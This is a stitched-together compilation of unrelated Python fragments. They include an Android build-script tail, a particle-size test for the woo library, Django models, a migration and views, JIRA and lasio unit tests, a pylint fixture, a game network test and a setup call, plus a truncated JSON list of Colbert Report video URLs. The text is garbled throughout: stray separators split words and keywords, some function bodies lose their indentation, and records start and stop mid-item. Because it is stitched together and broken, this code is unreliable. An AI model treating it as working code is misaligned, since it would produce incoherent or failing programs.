          '"adb root" failed on device: %s\n'
          'Skipping managed install for this device.'
          % configuration['description'])
      continue

    device_configurations.append(configuration)

  if not device_configurations:
    build_utils.PrintBigWarning(
        'No valid devices attached. Skipping managed install steps.')
  elif len(devices) > 1:
    # Checks len(devices), not len(device_configurations), so that the
    # chosen install target is stated explicitly whenever multiple devices
    # are attached, even if all but one were rejected above.
    build_utils.PrintBigWarning(
        'Multiple devices attached. '
        'Installing to the preferred device: '
        '%(id)s (%(description)s)' % (device_configurations[0]))

  build_device.WriteConfigurations(device_configurations, options.output)


if __name__ == '__main__':
  sys.exit(main(sys.argv))
|
'''
Test particle generator, that the resulting PSD curve matches the one on input.
'''
import unittest
from woo.core import *
from woo.dem import *
from minieigen import *
import numpy
class PsdSphereGeneratorTest(unittest.TestCase):
    '''Check that sphere packings produced by PsdSphereGenerator reproduce the prescribed PSD curve.'''
    def setUp(self):
        self.gen=PsdSphereGenerator(psdPts=[(.05,0),(.1,20),(.2,40),(.4,60),(.5,90),(.6,100)])
        self.mat=FrictMat(density=1000)
    def testMassDiscrete(self):
        'PSD: discrete mass-based generator'
        self.gen.mass=True; self.gen.discrete=True
        self.checkOk()
    def testMassContinuous(self):
        'PSD: continuous mass-based generator'
        self.gen.mass=True; self.gen.discrete=False
        self.checkOk(relDeltaInt=.03,relDeltaD=.1)
    def testNumDiscrete(self):
        'PSD: discrete number-based generator'
        self.gen.mass=False; self.gen.discrete=True
        self.checkOk()
    def testNumContinuous(self):
        'PSD: continuous number-based generator'
        self.gen.mass=False; self.gen.discrete=False
        self.checkOk()
    def testMonodisperse(self):
        'PSD: monodisperse packing'
        self.gen.psdPts=[(.05,0),(.05,1)]
        self.gen.mass=True; self.gen.discrete=False
        # this cannot be checked with numpy.trapz, do it manually
        for i in range(10000): self.gen(self.mat)
        (id,im),(od,om)=self.gen.inputPsd(normalize=False),self.gen.psd(normalize=False)
        # TestCase.assert_ was removed in Python 3.12; use assertTrue
        self.assertTrue(id[0]==id[-1])
        self.assertAlmostEqual(im[-1],om[-1],delta=.04*im[-1])
    def testClippingSpuriousPoints(self):
        'PSD: clipping spurious values'
        self.gen.psdPts=[(0,0),(1,0),(5,5)]
        res=[(1,0),(5,1)]
        self.assertTrue(self.gen.psdPts==res)
        self.gen.psdPts=[(1,0),(5,2),(5,2),(5,2)]
        self.assertTrue(self.gen.psdPts==res)
    def testPsdTimeRange(self):
        'PSD: time range for computing PSD'
        # generate radii in different ranges at t=0 and t=1
        self.gen.psdPts=[(.1,0),(.2,1)]
        for i in range(50): self.gen(self.mat,0)
        self.gen.psdPts=[(1,0),(2,1)]
        for i in range(50): self.gen(self.mat,1)
        # now check that max and min in that time correspond
        psdA=self.gen.psd(normalize=True,num=10,tRange=(0,.5))
        psdB=self.gen.psd(normalize=True,num=10,tRange=(.5,2.))
        self.assertTrue(psdA[0][0]<.2 and psdA[0][-1]>.1)
        self.assertTrue(psdB[0][0]<2 and psdB[0][-1]>1.)
    def checkOk(self,relDeltaInt=.02,relDeltaD=.04):
        # generate many particles, then compare input and output PSDs
        for i in range(10000): self.gen(self.mat)
        iPsd=self.gen.inputPsd(normalize=False)
        iPsdNcum=self.gen.inputPsd(normalize=False,cumulative=False,num=150)
        # scale by mass rather than number depending on the generator setup
        oPsd=self.gen.psd(mass=self.gen.mass,normalize=False,num=150)
        oPsdNcum=self.gen.psd(mass=self.gen.mass,normalize=False,num=150,cumulative=False)
        iInt=numpy.trapz(*iPsd)
        oInt=numpy.trapz(*oPsd)
        if 0: # enable to show graphical output
            import pylab
            pylab.figure()
            pylab.subplot(211)
            pylab.plot(*iPsd,label='in (%g)'%iInt)
            pylab.plot(*oPsd,label='out (%g)'%oInt)
            desc=('mass' if self.gen.mass else 'num','discrete' if self.gen.discrete else 'continuous')
            pylab.suptitle('%s-based %s generator (rel. area err %g)'%(desc[0],desc[1],(oInt-iInt)/iInt))
            # pylab.xlabel('Particle diameter')
            pylab.ylabel('Cumulative '+('mass' if self.gen.mass else 'number of particles'))
            pylab.grid(True)
            pylab.legend(loc='upper left')
            pylab.subplot(212)
            pylab.plot(*iPsdNcum,label='in')
            pylab.plot(*oPsdNcum,label='out')
            desc=('mass' if self.gen.mass else 'num','discrete' if self.gen.discrete else 'continuous')
            pylab.suptitle('%s-based %s generator (rel. area err %g)'%(desc[0],desc[1],(oInt-iInt)/iInt))
            pylab.xlabel('Particle diameter')
            pylab.ylabel('Histogram: '+('mass' if self.gen.mass else 'number of particles'))
            pylab.grid(True)
            pylab.legend(loc='upper left')
            pylab.savefig('/tmp/psd-test-%s-%s.png'%desc)
        # relative area tolerance (relDeltaInt; was mislabeled "1%")
        self.assertAlmostEqual(iInt,oInt,delta=relDeltaInt*iInt)
        # check that integration minima and maxima match
        dMin,dMax=self.gen.psdPts[0][0],self.gen.psdPts[-1][0]
        # minimum diameter for discrete PSDs is the first one with fraction > 0
        if self.gen.discrete: dMin=[dd[0] for dd in self.gen.psdPts if dd[1]>0][0]
        # relative diameter tolerance (relDeltaD; was mislabeled "3%")
        self.assertAlmostEqual(dMin,oPsd[0][0],delta=relDeltaD*dMin)
        self.assertAlmostEqual(dMax,oPsd[0][-1],delta=relDeltaD*dMax)
class BiasedPositionTest(unittest.TestCase):
    '''Check biased position mapping of particle diameters in inlets.'''
    def testAxialBias(self):
        'Inlet: axial bias'
        bb=AxialBias(axis=0,d01=(2,1),fuzz=.1)
        d0,d1=bb.d01
        for d in numpy.linspace(.5,2.5):
            p=bb.unitPos(d)[0]
            pMid=numpy.clip((d-d0)/(d1-d0),0,1)
            # TestCase.assert_ was removed in Python 3.12; use assertTrue
            self.assertTrue(abs(p-pMid)<=bb.fuzz/2.)
|
# -*- | coding: utf-8 -*-
'''
Created on 18 oct 2013
@author: franck
'''
from django.db import models
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import User
from movesevent.models.movesApp import MovesApp
class MovesUser(models.Model):
    """
    Moves user profile.

    Links a Django ``User`` to a ``MovesApp`` and stores the OAuth
    access token obtained from the Moves API.
    """
    user = models.ForeignKey(User)
    app = models.ForeignKey(MovesApp)
    # Automatically refreshed on every save.
    last_modified = models.DateTimeField(_(u"Last modification date"), auto_now=True, blank=True)
    # Set once when the row is first created.
    created_date = models.DateTimeField(_(u"Creation date"), auto_now_add=True, blank=True)
    # Moves OAuth access token (empty until the OAuth flow completes).
    access_token = models.CharField(max_length=255, null=True, blank=True)

    def __unicode__(self):
        return '%s/%s' % (self.user.username, self.app.app_name)

    # Required so Django attaches the model to the right app when
    # generating the database schema.
    class Meta:
        app_label = 'movesevent'
        unique_together = (("user", "app"),)
        verbose_name = "Moves user"
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, m | igrations
class Migration(migrations.Migration):
    # Auto-generated Django migration; schema edits should normally come
    # from `makemigrations`, not manual changes here.
    dependencies = [
        ('main', '0012_auto_20160204_1503'),
    ]
    operations = [
        # Add the custom "can_be_assigned" permission to EventAssignment.
        migrations.AlterModelOptions(
            name='eventassignment',
            options={'permissions': (('can_be_assigned', 'Can be assigned to events'),)},
        ),
        # Extend the SuggestedEvent.status choice set.
        migrations.AlterField(
            model_name='suggestedevent',
            name='status',
            field=models.CharField(default=b'created', max_length=40, choices=[(b'created', b'Created'), (b'submitted', b'Submitted'), (b'resubmitted', b'Resubmitted'), (b'rejected', b'Bounced back'), (b'retracted', b'Retracted'), (b'accepted', b'Accepted'), (b'removed', b'Removed')]),
            preserve_default=True,
        ),
        # Refresh the admin help text for Template.content.
        migrations.AlterField(
            model_name='template',
            name='content',
            field=models.TextField(help_text=b"The HTML framework for this template. Use <code>{{ any_variable_name }}</code> for per-event tags. Other Jinja2 constructs are available, along with the related <code>request</code>, <code>datetime</code>, <code>event</code> objects, and the <code>md5</code> function. You can also reference <code>autoplay</code> and it's always safe. Additionally we have <code>vidly_tokenize(tag, seconds)</code>, <code>edgecast_tokenize([seconds], **kwargs)</code> and <code>akamai_tokenize([seconds], **kwargs)</code><br> Warning! Changes affect all events associated with this template."),
            preserve_default=True,
        ),
    ]
|
i | mport f | oo, bar |
# Copyright 2016 David Lapsley
#
# Licensed under the Apache License, Version 2.0 (the "License" | );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License | .
import jira
import source
import unittest
import mock
class TestSource(unittest.TestCase):
    """Exercise JIRASource iteration against a fully mocked JIRA client."""

    @mock.patch('jira.JIRA.__init__',
                mock.Mock(return_value=None))
    @mock.patch('jira.JIRA.search_issues',
                mock.Mock(return_value=[0, 1, 2, 3]))
    def test_something(self):
        src = source.JIRASource('server', 'user', 'password', '')
        # mocked search_issues yields 0..3, so each issue equals its index
        for expected, issue in enumerate(src):
            self.assertEqual(issue, expected)


if __name__ == '__main__':
    unittest.main()
.cc.com/videos/wanzdw/who-s-riding-my-coattails-now----jeopardy",
"http://thecolbertreport.cc.com/videos/bp43w6/the-word---killing-two-birds",
"http://thecolbertreport.cc.com/videos/49jjmd/alabama-miracle---the-stephen-colbert-museum---gift-shop--grand-opening",
"http://thecolbertreport.cc.com/videos/8rjs2g/nora-ephron"
],
"guest": "Nora Ephron"
},
{
"date": "2006-11-30",
"videos": [
"http://thecolbertreport.cc.com/videos/wzpzqs/intro---11-30-06",
"http://thecolbertreport.cc.com/videos/4c2tdv/vilsack-attack",
"http://thecolbertreport.cc.com/videos/z88s3n/p-k--winsome---if-p-k--winsome-did-it",
"http://thecolbertreport.cc.com/videos/0inrmr/colbert-nation-merchandise",
"http://thecolbertreport.cc.com/videos/jotybg/alabama-miracle---the-morning-after",
"http://thecolbertreport.cc.com/videos/hv1lim/mike-lupica",
"http://thecolbertreport.cc.com/videos/k1wdp2/sign-off---wall-notch"
],
"guest": "Mike Lupica"
},
{
"date": "2006-12-04",
"videos": [
"http://thecolbertreport.cc.com/videos/9s5cs9/intro---12-4-06",
"http://thecolbertreport.cc.com/videos/ozd0a8/sherman-wedding",
"http://thecolbertreport.cc.com/videos/sjup2k/the-word---american-orthodox",
"http://thecolbertreport.cc.com/videos/shtpb9/tip-wag---christmas",
"http://thecolbertreport.cc.com/videos/tc5d1m/will-wright",
"http://thecolbertreport.cc.com/videos/xpx8ua/sign-off---extra-special-comment---tie-stain"
],
"guest": "Will Wright"
},
{
"date": "2006-12-05",
"videos": [
"http://thecolbertreport.cc.com/videos/z40k91/intro---12-5-06",
"http://thecolbertreport.cc.com/videos/6ixmt6/-return--to-the-moon",
"http://thecolbertreport.cc.com/videos/mz0h4p/robert-gates--confirmation",
"http://thecolbertreport.cc.com/videos/msrwcg/the-word---honest-injun",
"http://thecolbertreport.cc.com/videos/3odbkp/sport-report---coach-mancini",
"http://thecolbertreport.cc.com/videos/tjdbeu/sign-off---number-one-source",
"http://thecolbertreport.cc.com/videos/c1sa92/steven-levitt"
],
    "guest": "Steven D. Levitt"
},
{
"date": "2006-12-06",
"videos": [
"http://thecolbertreport.cc.com/videos/fe08hq/intro---12-6-06",
"http://thecolbertreport.cc.com/videos/oamjbp/life-size-nativity",
"http://the | colbertreport.cc.com/videos/ikcmp0/mary-cheney",
"http://thecolbertreport.cc.com/videos/4fr9o9/the-word---words",
"http://thecolbertreport.cc.com/videos/76wnkt/tek-jansen---tek-the-halls",
"http://thecolbertreport.cc.com/videos/0wq | kww/john-sexton",
"http://thecolbertreport.cc.com/videos/8suoui/sign-off---cardboard-box"
],
"guest": "John Sexton"
},
{
"date": "2006-12-07",
"videos": [
"http://thecolbertreport.cc.com/videos/k9wcbv/intro---12-7-06",
"http://thecolbertreport.cc.com/videos/ebabt9/david-gregory",
"http://thecolbertreport.cc.com/videos/kvccyn/the-word---case-closed",
"http://thecolbertreport.cc.com/videos/tk750r/elizabeth-de-la-vega",
"http://thecolbertreport.cc.com/videos/dntxcy/green-screen-challenge---counter-challenge",
"http://thecolbertreport.cc.com/videos/4koanp/alpha-dog-of-the-week---john-bolton",
"http://thecolbertreport.cc.com/videos/dqyz7h/francis-collins",
"http://thecolbertreport.cc.com/videos/rqe98q/sign-off---tgit"
],
"guest": "Dr. Francis S. Collins"
},
{
"date": "2006-12-11",
"videos": [
"http://thecolbertreport.cc.com/videos/ri4vbo/intro---12-11-06",
"http://thecolbertreport.cc.com/videos/t0abnh/defending-rosie",
"http://thecolbertreport.cc.com/videos/uea9ov/jack-kingston",
"http://thecolbertreport.cc.com/videos/k0a3hu/the-white-christmas-album",
"http://thecolbertreport.cc.com/videos/2cea2e/threatdown---christmas-style",
"http://thecolbertreport.cc.com/videos/bqpkoy/peter-singer",
"http://thecolbertreport.cc.com/videos/5alg6c/got-your-back"
],
"guest": "Dr. Peter Singer"
},
{
"date": "2006-12-12",
"videos": [
"http://thecolbertreport.cc.com/videos/35u0ts/intro---12-12-06",
"http://thecolbertreport.cc.com/videos/kn0mlp/augusto-pinochet-s-coup",
"http://thecolbertreport.cc.com/videos/dctycd/shout-out----beef-hammer-flag",
"http://thecolbertreport.cc.com/videos/1o4xvk/the-word---casualty-of-war",
"http://thecolbertreport.cc.com/videos/e1504w/who-s-honoring-me-now----merriam-webster-s-word-of-the-year",
"http://thecolbertreport.cc.com/videos/xd9itr/better-know-a-district---new-members-of-congress-at-the-kennedy-school",
"http://thecolbertreport.cc.com/videos/j01zz1/dan-savage",
"http://thecolbertreport.cc.com/videos/s3gs7u/sign-off---post-show-taco-bell-chalupa-chow-down"
],
"guest": "Dan Savage"
},
{
"date": "2006-12-13",
"videos": [
"http://thecolbertreport.cc.com/videos/6ohkja/intro---12-13-06",
"http://thecolbertreport.cc.com/videos/yl018s/stephen-jr--s-christmas-miracle",
"http://thecolbertreport.cc.com/videos/suc40d/the-word---it-s-a-small-world",
"http://thecolbertreport.cc.com/videos/5uk9gs/replenishing-the-eggnog-supply",
"http://thecolbertreport.cc.com/videos/d0ml1u/sea-tac-s-christmas-trees-restored",
"http://thecolbertreport.cc.com/videos/x1f8dg/doris-kearns-goodwin",
"http://thecolbertreport.cc.com/videos/0kcywr/charge-me-twice-for-stephen"
],
"guest": "Doris Kearns Goodwin"
},
{
"date": "2006-12-14",
"videos": [
"http://thecolbertreport.cc.com/videos/lwojc9/intro---12-14-06",
"http://thecolbertreport.cc.com/videos/3moulc/finger-strengthening",
"http://thecolbertreport.cc.com/videos/5dvej7/the-american-people-are-to-blame",
"http://thecolbertreport.cc.com/videos/60ds73/the-word---clarity",
"http://thecolbertreport.cc.com/videos/klp05i/blood-in-the-water---bruce-tinsley-s-dui",
"http://thecolbertreport.cc.com/videos/wauy3f/caesar-honeybee-or-tyrone-hunnibi-",
"http://thecolbertreport.cc.com/videos/yaoen5/daniel-pinchbeck",
"http://thecolbertreport.cc.com/videos/ua9gte/letter-to-representative-jack-kingston"
],
"guest": "Daniel Pinchbeck"
},
{
"date": "2006-12-18",
"videos": [
"http://thecolbertreport.cc.com/videos/t66x66/intro---12-18-06",
"http://thecolbertreport.cc.com/videos/j56gn9/diy-cold-medicine",
"http://thecolbertreport.cc.com/videos/ndrsqu/profiles-in-balls",
"http://thecolbertreport.cc.com/videos/mv0dai/the-word---the-draft",
"http://thecolbertreport.cc.com/videos/c4vji3/tip-wag---art-edition",
"http://thecolbertreport.cc.com/videos/nnpc32/jack-welch",
"http://thecolbertreport.cc.com/videos/yy82av/the-jingle-terns"
],
"guest": "Jack Welch"
},
{
"date": "2006-12-19",
"videos": [
"http://thecolbertreport.cc.com/videos/an4q7j/intro---12-19-06",
"http://thecolbertreport.cc.com/videos/q9o6sw/person-of-the-year",
"http://thecolbertreport.cc.com/videos/qh5kz9/stephen-goes-to-harvard",
"http://thecolbertreport.cc.com/videos/v81egv/deepak-chopra",
"http://thecolbertreport.cc.com/videos/3fhkpv/face-off-preview",
"http://thecolbertreport.cc.com/videos/kza2d8/the-word---tit-for-tat"
],
"guest": "Deepak Chopra"
},
{
"date": "2006-12-20",
"videos": [
"http://thecolbertreport.cc.com/videos/ouau0r/intro---12-20-06",
"http://thecolbertreport.cc.com/videos/8t5vas/rock-and-awe--countdown-to-guitarmageddon",
"http://thecolbertreport.cc.com/videos/lyahfg/shreddown",
"http://thecolbertreport.cc.com/videos/iocz1g/chris-funk",
"http://thecolbertreport.cc.com/videos/4hpbzt/peter-frampton",
"http://thecolbertreport.cc.com/videos/m75mj |
import os, sys; sys.path.insert(0, os.path.dirname(os.path.dirname(__file__)))
import pytest
from lasio import read
# Directory containing this test module; example LAS files live under examples/.
test_dir = os.path.dirname(__file__)

def egfn(fn):
    """Return the path of example file *fn* inside the examples/ directory.

    Replaces the original named lambda (PEP 8 discourages assigning lambdas
    to names) and reuses ``test_dir`` instead of recomputing the dirname.
    """
    return os.path.join(test_dir, "examples", fn)
def test_open_url():
    """lasio can read a LAS file fetched over HTTPS."""
    # No assignment needed: the original bound the result to an unused,
    # ambiguously named local ``l`` (flake8 E741/F841).  read() raising
    # is the failure signal.
    read("https://raw.githubusercontent.com/kinverarity1/"
         "lasio/master/standards/examples"
         "/1.2/sample_curve_api.las")
def test_open_file_object():
    """lasio accepts an already-open text-mode file object."""
    with open(egfn("sample.las"), mode="r") as f:
        # Drop the unused ambiguous local ``l`` (flake8 E741/F841);
        # a parse failure raises and fails the test on its own.
        read(f)
def test_open_filenam | e():
l = read(egfn("sample.las"))
def test_open_incorrect_filename():
    """Reading a nonexistent file raises OSError (not a silent failure)."""
    with pytest.raises(OSError):
        # Drop the unused ambiguous local ``l`` (flake8 E741/F841).
        read(egfn("sampleXXXDOES NOT EXIST.las"))
def test_open_string():
    """lasio parses LAS 1.2 content supplied directly as a string.

    The literal below is a minimal LAS 1.2 file (version, well, curve and
    parameter sections plus three rows of ASCII data) and must stay
    byte-identical -- it is the input under test, not documentation.
    """
    l = read("""~VERSION INFORMATION
 VERS. 1.2: CWLS LOG ASCII STANDARD -VERSION 1.2
 WRAP. NO: ONE LINE PER DEPTH STEP
~WELL INFORMATION BLOCK
#MNEM.UNIT DATA TYPE INFORMATION
#--------- ------------- ------------------------------
STRT.M 1670.000000:
STOP.M 1660.000000:
STEP.M -0.1250:
NULL. -999.2500:
COMP. COMPANY: # ANY OIL COMPANY LTD.
WELL. WELL: ANY ET AL OIL WELL #12
FLD . FIELD: EDAM
LOC . LOCATION: A9-16-49-20W3M
PROV. PROVINCE: SASKATCHEWAN
SRVC. SERVICE COMPANY: ANY LOGGING COMPANY LTD.
DATE. LOG DATE: 25-DEC-1988
UWI . UNIQUE WELL ID: 100091604920W300
~CURVE INFORMATION
#MNEM.UNIT API CODE CURVE DESCRIPTION
#--------- ------------- ------------------------------
DEPT.M : 1 DEPTH
DT .US/M : 2 SONIC TRANSIT TIME
RHOB.K/M3 : 3 BULK DENSITY
NPHI.V/V : 4 NEUTRON POROSITY
SFLU.OHMM : 5 RXO RESISTIVITY
SFLA.OHMM : 6 SHALLOW RESISTIVITY
ILM .OHMM : 7 MEDIUM RESISTIVITY
ILD .OHMM : 8 DEEP RESISTIVITY
~PARAMETER INFORMATION
#MNEM.UNIT VALUE DESCRIPTION
#--------- ------------- ------------------------------
BHT .DEGC 35.5000: BOTTOM HOLE TEMPERATURE
BS .MM 200.0000: BIT SIZE
FD .K/M3 1000.0000: FLUID DENSITY
MATR. 0.0000: NEUTRON MATRIX(0=LIME,1=SAND,2=DOLO)
MDEN. 2710.0000: LOGGING MATRIX DENSITY
RMF .OHMM 0.2160: MUD FILTRATE RESISTIVITY
DFD .K/M3 1525.0000: DRILL FLUID DENSITY
~Other
Note: The logging tools became stuck at 625 meters causing the data
between 625 meters and 615 meters to be invalid.
~A DEPTH DT RHOB NPHI SFLU SFLA ILM ILD
1670.000 123.450 2550.000 0.450 123.450 123.450 110.200 105.600
1669.875 123.450 2550.000 0.450 123.450 123.450 110.200 105.600
1669.750 123.450 2550.000 0.450 123.450 123.450 110.200 105.600
""")
|
"""bla"""
# pylint: disable=no-absolute- | import
__revision__ = 'yo'
from input import func_w0233
class Aaaa(func_w0233.AAAA):
    """test dotted name in ancestors"""
    # NOTE(review): this is a pylint regression fixture -- the explicit
    # dotted-name call to the parent's __init__ is the behavior under test
    # (W0233 "non-parent init" must NOT fire here).  Do not "modernize"
    # this to super(); that would defeat the fixture's purpose.
    def __init__(self):
        func_w0233.AAAA.__init__(self)
|
#####################################################################
# -*- coding: iso-8859-1 -*- #
# #
# Frets on Fire #
# Copyright (C) 2006 Sami Kyöstilä #
# #
# This program is free software; you can redistribute it and/or #
# modify it under the terms of the GNU General Public License #
# as published by the Free Software Foundation; either version 2 #
# of the License, or (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty o | f #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program; if not, write to the Free Software #
| # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, #
# MA 02110-1301, USA. #
#####################################################################
import unittest
import Network
import time
class TestConnection(Network.Connection):
    """Connection that remembers the last packet it received."""
    # NOTE(review): handlePacket is assumed to be the Network.Connection
    # receive hook -- inferred only from its use in testHandshake below.
    def handlePacket(self, packet):
        # Keep the payload so the test can assert on it afterwards.
        self.packet = packet
class TestServer(Network.Server):
    """Server that wraps each incoming socket in a TestConnection."""
    # NOTE(review): createConnection is assumed to be the Network.Server
    # factory hook for accepted sockets -- confirm against Network.py.
    def createConnection(self, sock):
        return TestConnection(sock)
class NetworkTest(unittest.TestCase):
    """End-to-end handshake test for the Network client/server layer."""

    def testHandshake(self):
        """A client connects, sends one packet, and the server records it."""
        s = TestServer()
        c = TestConnection()
        c.connect("localhost")
        c.sendPacket("moikka")
        # Pump the network event loop so the packet is delivered.
        Network.communicate(100)
        # Fix: dict.values()[0] is Python 2 only -- on Python 3, values()
        # returns a non-indexable view.  next(iter(...)) works on both.
        client = next(iter(s.clients.values()))
        assert client.packet == "moikka"
        assert client.id == 1

    def tearDown(self):
        # Always release sockets, even when the assertions above fail.
        Network.shutdown()
if __name__ == "__main__":
    # Run the network tests when this module is executed as a script.
    unittest.main()
|
from distutils.core import setup

# NOTE(review): the original call was a SyntaxError -- every keyword argument
# was missing its separating comma, and package_dir used the bare undefined
# name ``src`` instead of the string 'src'.  The 'src' directory mapping is
# the conventional reading of the original intent -- confirm the sdist layout.
setup(
    name='quaternion_class',
    author='Matthew Nichols',
    author_email='mattnichols@gmail.com',
    packages=['quaternion'],
    # The 'quaternion' package sources live under src/.
    package_dir={'quaternion': 'src'},
)
from | django.shortcuts import render
from django.conf.urls import patterns, url
from django.core.urlresolvers import reverse_lazy
from django.views.generic import TemplateView
from django.contrib.auth.decorators import login_required
from edamame import base, utils, generic
from | . import models
class SiteViews(base.Views):
    """Site-wide pages: the landing page plus a static test page."""

    def index(self, request):
        """Render the landing-page template."""
        return render(request, 'index.html')

    # Wrap the class-based TemplateView so it can live on this Views class.
    test_page = utils.to_method(
        TemplateView.as_view(template_name='test_page.html'))

    def get_urls(self):
        """Return the URLconf for this view set ('' -> index, 'test_page')."""
        routes = (
            url(r'^$', self.wrap_view(self.index), name='index'),
            url(r'^test_page$',
                self.wrap_view(self.test_page), name='test_page'),
        )
        return patterns('', *routes)


site_views = SiteViews()
class NoteViews(generic.ModelViews):
    # CRUD view set for the Note model; after a successful form submission,
    # redirect to the note index (URL resolved lazily, at request time).
    model = models.Note
    success_url = reverse_lazy('note:index')
note_views = NoteViews()
class MembersOnlyViews(base.Views):
    """Pages restricted to authenticated users."""

    # render() wrapped as a method; always serves members_only.html.
    members_only = utils.to_method(render, template_name='members_only.html')

    # Every view in this set is wrapped with login_required, sending
    # anonymous users to the 'auth:login' URL.
    view_decorators = (
        (login_required, (), {'login_url': 'auth:login'}),
    )

    def get_urls(self):
        """Return the URLconf: the root of this set serves members_only."""
        route = url(r'^$', self.wrap_view(self.members_only),
                    name='members_only')
        return patterns('', route)


members_only_views = MembersOnlyViews()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.